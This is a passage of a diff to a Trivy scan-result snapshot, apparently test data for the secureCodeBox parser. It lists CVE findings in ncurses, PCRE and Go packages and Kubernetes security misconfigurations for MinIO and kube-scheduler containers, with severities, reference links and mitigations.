"https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", + ], + }, + "category": "Vulnerability", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Local users can trigger security-relevant memory corruption via malformed data", + "references": [ { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1586", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/errata/RHSA-2022:5809", + "https://access.redhat.com/security/cve/CVE-2022-1586", + "https://bugzilla.redhat.com/2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "https://errata.rockylinux.org/RLSA-2022:5809", + "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "https://linux.oracle.com/cve/CVE-2022-1586.html", + "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1586", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-1586", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/errata/RHSA-2022:5809", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2022-1586", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://bugzilla.redhat.com/2077976", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://errata.rockylinux.org/RLSA-2022:5809", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5627-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5627-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1587", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "https://access.redhat.com/security/cve/CVE-2022-1587", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "https://linux.oracle.com/cve/CVE-2022-1587.html", + "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1587", ], }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "category": "Vulnerability", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.allowPrivilegeEscalation' to false)", + "mitigation": undefined, + "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://avd.aquasec.com/nvd/cve-2022-1587", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/security/cve/CVE-2022-1587", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'minio' of Deployment 'securecodebox-operator-minio' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://ubuntu.com/security/notices/USN-5627-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-11164", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", + "http://openwall.com/lists/oss-security/2017/07/11/3", + "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "http://www.securityfocus.com/bid/99575", + "https://access.redhat.com/security/cve/CVE-2017-11164", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "https://www.cve.org/CVERecord?id=CVE-2017-11164", ], }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "category": "Vulnerability", + "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "mitigation": undefined, + "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://avd.aquasec.com/nvd/cve-2017-11164", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "http://openwall.com/lists/oss-security/2017/07/11/3", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3134-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3161-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u10", - "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3366-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u11", - "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3412-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0040", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0040", - ], - }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Edit the Scheduler pod specification file /etc/kubernetes/manifests/kube-scheduler.yaml file on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0040", + "value": "http://www.securityfocus.com/bid/99575", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2017-11164", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ 